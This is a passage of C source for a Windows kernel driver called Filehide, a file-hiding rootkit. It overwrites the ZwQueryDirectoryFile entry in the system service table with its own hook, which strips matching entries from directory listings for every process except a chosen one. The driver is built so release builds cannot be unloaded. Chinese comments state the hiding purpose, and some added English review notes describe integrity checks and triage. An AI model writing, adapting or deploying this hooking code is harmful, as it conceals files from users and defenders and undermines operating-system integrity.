//PCWSTR str2=name;
//if (str==str2) //不分大小写的比较现两个字符串
if(memcmp(SkipExe,name,strlen(SkipExe))==0) //对于我指定的进程不隐藏。
{
DbgPrint(("隐藏了文件放行%s\n",name));
}else
{
DbgPrint(("隐藏了文件%s\n",name));
rc = 0x80000006; //hide
}
}
else
pLast->dwLenToNext = 0;
break;
}
else
{
int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer;
int iLeft = (DWORD)FileInformationBufferLength - iPos-p->dwLenToNext;
RtlCopyMemory( (PVOID)p, (PVOID)( (char *)p +p->dwLenToNext ), (DWORD)iLeft );
continue;
}
}
pLast = p;
p = (PDirEntry)((char *)p + p->dwLenToNext );
}while( !bLastOne );
RtlFreeAnsiString(&ansiDirName);
RtlFreeAnsiString(&ansiFileName);
RtlFreeAnsiString(&aFilehide);
}
return(rc);
}
//----------------------------------------------------------------------
//
// Hook System Call
//
// Replaces entries in the system service table with pointers to
// our own hook routines. We save off the real routine addresses.
//
//----------------------------------------------------------------------
VOID HookSystemCall( void )
{
    //
    // Hook everything
    // (original note: "hook my function")
    //
    // Saves the current ZwQueryDirectoryFile entry of the service table
    // addressed by SYSCALL() into RealZwQueryDirectoryFile, then overwrites
    // that entry with HookZwQueryDirectoryFile. UnhookSystemCall() reverses
    // the write using the saved value, so this must run exactly once before it.
    //
    // NOTE(review): SYSCALL() is defined outside this view; it is presumably
    // an lvalue into the table reached through ServiceTable — confirm. The
    // store below is a plain, unsynchronized write to a kernel-owned table
    // and is the classic service-table patch that kernel integrity checks
    // (an entry pointing outside the OS image) are designed to surface.
    //
    RealZwQueryDirectoryFile = SYSCALL( ZwQueryDirectoryFile );
    SYSCALL( ZwQueryDirectoryFile ) = (PVOID) HookZwQueryDirectoryFile;
}
//----------------------------------------------------------------------
//
// Unhook System Call
//
//----------------------------------------------------------------------
VOID UnhookSystemCall( )
{
    //
    // Unhook everything
    // (original note: "restore the original API function")
    //
    // Writes the pointer saved by HookSystemCall() back into the
    // ZwQueryDirectoryFile slot. Nothing here waits for callers that
    // already dispatched through HookZwQueryDirectoryFile before the
    // restore — NOTE(review): confirm the caller (FilehideUnload) is only
    // reached when no such call can be in flight.
    //
    // The empty parameter list is an old-style declaration; `( void )`
    // would make it a prototype like HookSystemCall above.
    //
    SYSCALL( ZwQueryDirectoryFile ) = (PVOID) RealZwQueryDirectoryFile;
}
//----------------------------------------------------------------------
//
// FilehideDispatch
//
//----------------------------------------------------------------------
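NTSTATUS FilehideDispatch( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
    //
    // Dispatch routine registered in DriverEntry for CREATE, CLOSE,
    // SHUTDOWN and DEVICE_CONTROL. Every request is completed here with
    // STATUS_SUCCESS and zero bytes of output; the return value is that
    // same status. Irp is completed before returning and must not be
    // touched by the caller afterwards. DeviceObject is unused because the
    // driver creates a single control device.
    //
    // Note for reviewers: IRP_MJ_DEVICE_CONTROL is accepted without looking
    // at the IOCTL code or any buffer, so any caller able to open the
    // device receives success regardless of what it sends.
    //
    PIO_STACK_LOCATION irpStack;

    (void)DeviceObject;

    //
    // Go ahead and set the request up as successful
    //
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;

    //
    // Get a pointer to the current location in the Irp. This is where
    // the function codes and parameters are located.
    //
    irpStack = IoGetCurrentIrpStackLocation (Irp);

    switch (irpStack->MajorFunction) {
    case IRP_MJ_CREATE:
        DbgPrint(("Filehide: IRP_MJ_CREATE\n"));
        break;
    case IRP_MJ_SHUTDOWN:
        // Previously logged as IRP_MJ_CREATE (copy-paste); now names the real code.
        DbgPrint(("Filehide: IRP_MJ_SHUTDOWN\n"));
        break;
    case IRP_MJ_CLOSE:
        DbgPrint(("Filehide: IRP_MJ_CLOSE\n"));
        break;
    case IRP_MJ_DEVICE_CONTROL:
        DbgPrint (("Filehide: IRP_MJ_DEVICE_CONTROL\n"));
        break;
    default:
        // Only the four codes above are wired up in DriverEntry; anything
        // else arriving here is unexpected, so say so rather than stay silent.
        DbgPrint(("Filehide: unexpected major function\n"));
        break;
    }

    IoCompleteRequest( Irp, IO_NO_INCREMENT );
    return STATUS_SUCCESS;
}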
//----------------------------------------------------------------------
//
// FilehideUnload
//
// Our job is done - time to leave.
//
//----------------------------------------------------------------------
VOID FilehideUnload( IN PDRIVER_OBJECT DriverObject )
{
    //
    // Driver unload routine: restores the service-table entry, removes the
    // \DosDevices link and deletes the control device hanging off
    // DriverObject. Registered from DriverEntry only in DBG builds.
    //
    UNICODE_STRING linkName;
    WCHAR linkBuffer[] = L"\\DosDevices\\Filehide";

    DbgPrint(("Filehide.SYS: unloading\n"));

    // Put the service table back before this image is gone.
    // NOTE(review): nothing here waits for calls already inside the hook.
    UnhookSystemCall();

    // Remove the user-visible link first, then the device behind it.
    RtlInitUnicodeString( &linkName, linkBuffer );
    IoDeleteSymbolicLink( &linkName );
    IoDeleteDevice( DriverObject->DeviceObject );

    DbgPrint(("Filehide.SYS: deleted devices\n"));
}
//----------------------------------------------------------------------
//
// DriverEntry
//
// Installable driver initialization. Here we just set ourselves up.
//
//----------------------------------------------------------------------
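NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
{
    //
    // Installable driver initialization. Creates the \Device\Filehide
    // control device and its \DosDevices link, points the CREATE / CLOSE /
    // SHUTDOWN / DEVICE_CONTROL dispatch slots at FilehideDispatch, then
    // installs the service-table hook. Returns STATUS_SUCCESS, or the
    // failing IoCreateDevice / IoCreateSymbolicLink status after undoing
    // whatever had been created. RegistryPath is not consulted.
    //
    // Note for reviewers: in non-DBG builds no DriverUnload is registered,
    // so a release build stays resident until reboot and cannot be stopped
    // through the service manager — relevant when triaging a host.
    //
    // DbgPrint(( ... )) relies on a wrapper macro defined elsewhere that
    // expands the inner parenthesised list as the argument list.
    // NOTE(review): if DbgPrint here were the raw kernel routine, the comma
    // expression below would pass ServiceTable as the format string — confirm.
    //
    NTSTATUS ntStatus;
    WCHAR deviceNameBuffer[] = L"\\Device\\Filehide";
    UNICODE_STRING deviceNameUnicodeString;
    WCHAR deviceLinkBuffer[] = L"\\DosDevices\\Filehide";
    UNICODE_STRING deviceLinkUnicodeString;
    int deviceCreated = 0;

    (void)RegistryPath;

    DbgPrint (("Filehide.SYS: entering DriverEntry\n"));

    //
    // Setup our name and symbolic link
    //
    RtlInitUnicodeString (&deviceNameUnicodeString, deviceNameBuffer );
    RtlInitUnicodeString (&deviceLinkUnicodeString, deviceLinkBuffer );

    ntStatus = IoCreateDevice ( DriverObject,
                                0,
                                &deviceNameUnicodeString,
                                FILE_DEVICE_HIDE,
                                0,
                                TRUE,
                                &ControlDeviceObject );
    // Remember success locally instead of relying on the global being NULL
    // after a failed IoCreateDevice.
    deviceCreated = NT_SUCCESS(ntStatus);

    if (deviceCreated) {
        //
        // Create a symbolic link that the GUI can specify to gain access
        // to this driver/device
        //
        ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
                                         &deviceNameUnicodeString );

        //
        // Create dispatch points for all routines that must be handled
        //
        DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
        DriverObject->MajorFunction[IRP_MJ_CREATE] =
        DriverObject->MajorFunction[IRP_MJ_CLOSE] =
        DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] =
            FilehideDispatch;

        //
        // Only debug builds can be unloaded (see note above).
        //
#if DBG
        DriverObject->DriverUnload = FilehideUnload;
#endif
    }

    if (!NT_SUCCESS(ntStatus)) {
        DbgPrint(("Filehide: Failed to create our device!\n"));
        //
        // Something went wrong, so clean up (free resources etc).
        // The link is never present on this path: either IoCreateDevice
        // failed before it was attempted, or IoCreateSymbolicLink itself
        // failed — so only the device may need deleting.
        //
        if ( deviceCreated ) IoDeleteDevice( ControlDeviceObject );
        return ntStatus;
    }

    //
    // Pointer to system table data structure is an NTOSKRNL export
    //
    ServiceTable = KeServiceDescriptorTable;
    // %p rather than %x: ServiceTable holds a pointer, and %x truncates
    // it on 64-bit builds.
    DbgPrint(("Filehide: Servicetable: %p\n", ServiceTable ));

    HookSystemCall();
    DbgPrint(("Filehide: Hook System Call"));

    return STATUS_SUCCESS;
}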